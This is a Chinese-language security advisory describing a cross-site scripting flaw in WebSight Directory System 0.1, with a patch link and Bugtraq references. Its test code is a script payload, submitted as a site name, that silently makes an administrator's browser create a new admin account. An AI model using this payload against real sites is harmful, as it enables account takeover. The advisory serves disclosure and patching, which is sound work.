WebSight Directory System存在跨站脚本可执行漏洞发布时间:2002-03-28 更新时间:2002-03-28 严重程度:高 威胁程度:控制应用程序系统 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:4357 受影响系统 WebSight Directory System WebSight Directory System 0.1详细描述 WebSight Directory System没有过滤来自URL参数上的脚本代码,可导致远程攻击者建立包含脚本代码的恶意连接,当用户浏览此连接的时候,可导致代码在用户浏览器上执行,泄露COOKIE信息等。 测试代码 当提交新连接的时候作为WEB站点名提交如下: Example<script>bad=window.open("http://example.com/portal/administration/ userman.php?uname=black&newpass=hat&submituser=ok", "bad", "width=1,height=1");bad.close();</script> 当管理员检查的时候会弹开一小窗口然后关闭,然后新的ADMIN用户以black用户名,密码hat的形式生成。 解决方案 补丁下载: WebSight Directory System WebSight Directory System 0.1: WebSight Directory System Upgrade WebSight-0.1.1 http://prdownloads.sourceforge.net/websight/WebSight-0.1.1.zip 相关信息 ppp-design (security@ppp-design.de) 参考:http://archives.neohapsis.com/archives/bugtraq/2002-03/0304.html 相关主页:http://websight.sourceforge.net/ |
